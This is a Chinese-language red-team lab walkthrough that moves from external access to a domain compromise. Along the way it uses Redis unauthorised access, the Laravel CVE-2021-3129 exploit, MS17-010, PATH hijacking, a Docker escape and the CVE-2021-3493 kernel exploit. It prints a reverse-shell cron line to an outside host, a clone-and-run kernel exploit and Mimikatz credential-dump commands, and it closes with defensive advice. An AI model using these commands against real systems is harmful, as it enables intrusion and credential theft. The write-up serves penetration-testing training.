ATT&CK实战系列-红队评估(七)
字数 1332 2025-08-11 08:35:47

ATT&CK实战系列-红队评估(七) - 渗透测试全流程详解

0x00 外网打点

1. 信息收集与端口扫描

  • 目标IP: 192.168.10.246
  • 开放端口: 22(SSH), 80(HTTP), 81(HTTP), 6379(Redis)
  • 扫描发现6379端口存在Redis未授权访问漏洞

2. Redis未授权访问利用

  • 直接通过Redis未授权访问写入SSH公钥
  • 成功获取root权限
  • 使用Xshell连接便于文件传输
  • 上传代理工具gost建立隧道

3. Web服务渗透

  • 80端口返回404
  • 81端口运行Laravel框架
  • 利用CVE-2021-3129漏洞获取Webshell
  • 使用哥斯拉管理Webshell
  • 将shell派生到Metasploit框架

0x01 内网横向移动

1. 内网扫描发现

  • 发现192.168.52.30主机开放8080端口
  • 运行通达OA系统(旧版本)
  • 利用通达OA漏洞获取系统权限

2. 权限提升与端口管理

  • 添加系统用户
  • 手动开启3389(RDP)端口
  • 发现445端口开放,利用MS17-010(永恒之蓝)漏洞

3. 多层内网穿透

  • 使用gost工具进行端口转发
  • 将入口机3392端口穿透到内网机器3393端口
  • 发现192.168.93.0/24网段
  • 扫描发现93段两台主机

0x02 Docker提权

1. 环境发现

  • 通过Webshell发现Docker容器环境
  • 低权限用户jobs下发现可执行文件

2. PATH劫持提权

  • 发现可执行文件调用ps命令
  • 创建恶意ps脚本: 
    echo '/bin/bash' > /tmp/ps
chmod 777 /tmp/ps
export PATH=/tmp:$PATH
  • 执行后获取root权限

0x03 Docker特权模式逃逸

1. 磁盘分析

  • 使用fdisk -l发现/dev/sda1磁盘
  • 挂载磁盘到本地目录: 
    mkdir /mnt/host
mount /dev/sda1 /mnt/host

2. 定时任务反弹shell

  • 写入定时任务到宿主机: 
    echo 'bash -i >& /dev/tcp/192.168.11.243/1390 0>&1' >> /mnt/host/var/spool/cron/crontabs/root

3. SSH密钥认证

  • 发现宿主机ubuntu用户
  • 添加攻击者公钥到宿主机authorized_keys

0x04 Linux内核提权(CVE-2021-3493)

1. 漏洞检测

  • 检查内核版本在漏洞影响范围内
  • 下载并编译exp: 
    git clone https://github.com/briskets/CVE-2021-3493
cd CVE-2021-3493
make
./exploit
  • 成功获取宿主机root权限

0x05 域渗透

1. 域信息收集

  • 发现whoamianony域
  • 使用kiwi模块抓取密码: 
    load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonpasswords
  • 需要迁移到64位进程执行

2. 后续攻击思路

  1. 通过MS17-010攻击93段剩余主机
  2. 使用PsExec进行PTH(Pass-the-Hash)攻击
  3. 直接使用域控凭证登录93段主机

工具与技术总结

关键工具

  • gost: 内网穿透与端口转发
  • 哥斯拉: Webshell管理
  • Metasploit: 漏洞利用与后渗透
  • Redis-cli: Redis未授权访问利用

关键技术

  1. Redis未授权访问利用
  2. Laravel RCE(CVE-2021-3129)
  3. 通达OA漏洞利用
  4. MS17-010漏洞利用
  5. PATH环境变量劫持
  6. Docker特权逃逸
  7. Linux内核提权(CVE-2021-3493)
  8. 域凭证抓取与横向移动

防御建议

  1. Redis设置认证密码
  2. 及时更新Web框架和OA系统
  3. 禁用不必要的服务(如RDP)
  4. 及时修补MS17-010等漏洞
  5. 限制Docker容器权限
  6. 定期更新内核补丁
  7. 加强域账户权限管理
ATT&CK实战系列-红队评估(七) - 渗透测试全流程详解 0x00 外网打点 1. 信息收集与端口扫描 目标IP: 192.168.10.246 开放端口: 22(SSH), 80(HTTP), 81(HTTP), 6379(Redis) 扫描发现6379端口存在Redis未授权访问漏洞 2. Redis未授权访问利用 直接通过Redis未授权访问写入SSH公钥 成功获取root权限 使用Xshell连接便于文件传输 上传代理工具gost建立隧道 3. Web服务渗透 80端口返回404 81端口运行Laravel框架 利用CVE-2021-3129漏洞获取Webshell 使用哥斯拉管理Webshell 将shell派生到Metasploit框架 0x01 内网横向移动 1. 内网扫描发现 发现192.168.52.30主机开放8080端口 运行通达OA系统(旧版本) 利用通达OA漏洞获取系统权限 2. 权限提升与端口管理 添加系统用户 手动开启3389(RDP)端口 发现445端口开放,利用MS17-010(永恒之蓝)漏洞 3. 多层内网穿透 使用gost工具进行端口转发 将入口机3392端口穿透到内网机器3393端口 发现192.168.93.0/24网段 扫描发现93段两台主机 0x02 Docker提权 1. 环境发现 通过Webshell发现Docker容器环境 低权限用户jobs下发现可执行文件 2. PATH劫持提权 发现可执行文件调用ps命令 创建恶意ps脚本: 执行后获取root权限 0x03 Docker特权模式逃逸 1. 磁盘分析 使用 fdisk -l 发现/dev/sda1磁盘 挂载磁盘到本地目录: 2. 定时任务反弹shell 写入定时任务到宿主机: 3. SSH密钥认证 发现宿主机ubuntu用户 添加攻击者公钥到宿主机authorized_ keys 0x04 Linux内核提权(CVE-2021-3493) 1. 漏洞检测 检查内核版本在漏洞影响范围内 下载并编译exp: 成功获取宿主机root权限 0x05 域渗透 1. 域信息收集 发现whoamianony域 使用kiwi模块抓取密码: 需要迁移到64位进程执行 2. 后续攻击思路 通过MS17-010攻击93段剩余主机 使用PsExec进行PTH(Pass-the-Hash)攻击 直接使用域控凭证登录93段主机 工具与技术总结 关键工具 gost: 内网穿透与端口转发 哥斯拉: Webshell管理 Metasploit: 漏洞利用与后渗透 Redis-cli: Redis未授权访问利用 关键技术 Redis未授权访问利用 Laravel RCE(CVE-2021-3129) 通达OA漏洞利用 MS17-010漏洞利用 PATH环境变量劫持 Docker特权逃逸 Linux内核提权(CVE-2021-3493) 域凭证抓取与横向移动 防御建议 Redis设置认证密码 及时更新Web框架和OA系统 禁用不必要的服务(如RDP) 及时修补MS17-010等漏洞 限制Docker容器权限 定期更新内核补丁 加强域账户权限管理